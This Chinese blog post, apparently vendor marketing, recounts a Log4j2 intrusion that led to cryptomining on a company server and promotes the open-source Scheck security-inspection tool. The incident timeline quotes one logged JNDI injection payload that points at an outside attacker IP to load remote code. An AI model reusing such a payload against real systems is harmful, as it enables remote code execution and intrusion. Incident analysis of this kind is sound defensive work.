簡(jiǎn)介

2021年底，技術(shù)圈被 log4j2 漏洞掀起巨浪，各大安全公司紛紛發(fā)文介紹該漏洞的危害，并給出了各種臨時(shí)解決方案。還有一些博主也發(fā)表文章教我們?nèi)绾握业揭资芄舻牡胤剑⒉扇∠鄳?yīng)的防御措施。還有大量帖子跟著起哄，討論如何采用一些不必要的防御技術(shù)。12月29日，我們就發(fā)現(xiàn)了一起由 log4j2 漏洞引發(fā)的挖礦事件。

驚險(xiǎn)時(shí)刻

收到安全告警

事情還是要從一條告警說(shuō)起。12月29日 18:59，公司釘釘安全告警信息,親！df_solution_ecs_002存在2 個(gè) warn。由于warn 級(jí)別的告警不是很嚴(yán)重，所以當(dāng)時(shí)我們沒有太在意。

收到服務(wù)器CPU 99% 告警

19:34:00 收到安全告警30分鐘后，釘釘群內(nèi)突然收到CPU 飆升的告警。告警來(lái)的猝不及防，系統(tǒng)運(yùn)行很長(zhǎng)時(shí)間，怎么突發(fā)發(fā)生這種狀況。

發(fā)現(xiàn)可疑進(jìn)程

于是，我們趕緊登錄我們的觀測(cè)平臺(tái)查看服務(wù)器基礎(chǔ)信息。cpu 使用率太高了吧！同時(shí)我們發(fā)現(xiàn)進(jìn)程監(jiān)控中有5個(gè)惡意進(jìn)程CPU使用率為100%。此刻我們才發(fā)現(xiàn)，我主機(jī)應(yīng)該被挖礦了。馬上通知相關(guān)同事進(jìn)行處理，將惡意進(jìn)程關(guān)閉。

追蹤溯源

惡意進(jìn)程處理完成后，心中一陣后怕，老大也下達(dá)了要查明事故原因的命令。此刻我一陣頭大，我怎么查病毒入口？突然，腦中靈光一閃想到了剛剛安全告警。于是打開了安全巡檢的頁(yè)面，果然病毒注入留下了蛛絲馬跡被Scheck巡檢工具捕捉到。在12/29 18:52的時(shí)候發(fā)生5個(gè)以上的warn 安全告警事件，首先18:52病毒添加了免密登錄，18:57添加了一個(gè)用戶，之后有添加了二進(jìn)制文件等等。

知道了入侵時(shí)間，我打算在18:40～18:53 之間查看一些突破，觀測(cè)云可以根據(jù)當(dāng)時(shí)時(shí)間查看當(dāng)時(shí)服務(wù)器的狀態(tài)，指標(biāo)，還有日志。

終于在18:54左右的時(shí)候發(fā)現(xiàn)了這條日志，2021-12-29 18:50:23.906+0000 [id=66628] request param ${jndi:rmi://67.220.90.132:30023/test}0 ms。這不是那個(gè)最近這火的log4j 2的漏洞么！！！67.220.90.132地址還是美國(guó)加利福尼亞洛杉磯的。

最后，綜合這些線索，我畫了個(gè)時(shí)間圖，發(fā)現(xiàn)黑客進(jìn)行攻擊的時(shí)候，我們Scheck就已經(jīng)將惡意行為上報(bào)到了觀測(cè)平臺(tái)并進(jìn)行告警。在那時(shí)，只是我們沒有及時(shí)關(guān)注，還好我可以通過(guò)統(tǒng)一觀測(cè)平臺(tái)，進(jìn)行分析和觀測(cè)發(fā)現(xiàn)了源頭。

強(qiáng)烈推薦

經(jīng)歷了此次事件，要感謝觀測(cè)云的安全巡檢工具Scheck，讓我度過(guò)這次難關(guān)。服務(wù)器被入侵不可怕，可怕的不知道你是如何和入侵，黑客對(duì)主機(jī)做了哪些惡意操作，Scheck 可以實(shí)時(shí)監(jiān)控主機(jī)安全事件。此軟件安全可靠，支持二次開發(fā)，開源。是一款在運(yùn)行用戶本地機(jī)器上的一種安全巡檢工具。

我們?yōu)槭裁赐扑]使用Scheck

1、安全

Scheck 是款開源軟件，你可以放心使用。開源地址：https://github.com/GuanceCloud/scheck

Scheck 中的 Lua 不能引入第三方庫(kù)，直接的文件 IO 也是被禁止的，只能通過(guò) Golang 封裝的 Lua 接口才能對(duì)文件進(jìn)行讀取

2、高度一致的跨平臺(tái)可用性

在主流的 linux、windows 上均可直接使用無(wú)需考慮平臺(tái)兼容性

數(shù)據(jù)可觀測(cè)性

Scheck 的巡檢結(jié)果，可以直接導(dǎo)入觀測(cè)云，也可以導(dǎo)入阿里云SLS日志

3、可擴(kuò)展性

用戶可以自定義新的巡檢腳本，通過(guò)二次開發(fā)入口 即可方便的開發(fā)出新巡檢腳本。

Scheck 的作用到底是什么

Scheck 作為一款運(yùn)行用戶本地機(jī)器上的一種安全巡檢工具，他不做安全防護(hù)，但他們可以提前感知你的操作是否安全，主機(jī)被入侵時(shí)，黑客的惡意行為都會(huì)被Scheck 上報(bào)。你可以自己分析和觀測(cè)，目前沒有絕對(duì)安全的軟件來(lái)保證你主機(jī)安全，但是Scheck可以保證黑客或其他的不安全的操作都會(huì)被記錄和上報(bào)。

這就是我們強(qiáng)烈推薦 Scheck 原因！